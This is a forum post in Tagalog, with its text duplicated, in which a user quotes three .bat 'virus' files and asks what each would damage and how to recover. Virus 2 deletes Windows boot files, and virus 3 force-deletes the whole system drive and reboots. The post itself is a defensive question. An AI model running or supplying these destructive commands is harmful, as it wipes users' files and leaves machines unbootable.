hello to all,
may mga nakita akong virus na .bat po
at ito ang laman ng bawat .bat
sa virus 1
sa virus 2
sa virus 3
ang tanung ko po sana, sa bawat virus na yan
paki specify naman po kung anu ang matatamaan sa pc ko
just incase na mairun ko yan..
at anu po ang gagawing solution kung na run ko nga.
maraming salamat po.
may mga nakita akong virus na .bat po
at ito ang laman ng bawat .bat
sa virus 1
Code:
echo off
@echo off
echo this is a virus
pause
echo deleting all files
pause
dir/s
pause
acho all done
pause
echo shutting down computer
shutdown -s -t "5" -c "Deleting Files"
sa virus 2
Code:
@echo off attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini attrib -r -s -h c:ntldr
del c:ntldr attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
sa virus 3
Code:
@echo off
del %systemdrive%*.* /f /s /q /g /h /d /c /a
shutdown -r -f -t 00
ang tanung ko po sana, sa bawat virus na yan
paki specify naman po kung anu ang matatamaan sa pc ko
just incase na mairun ko yan..
at anu po ang gagawing solution kung na run ko nga.
maraming salamat po.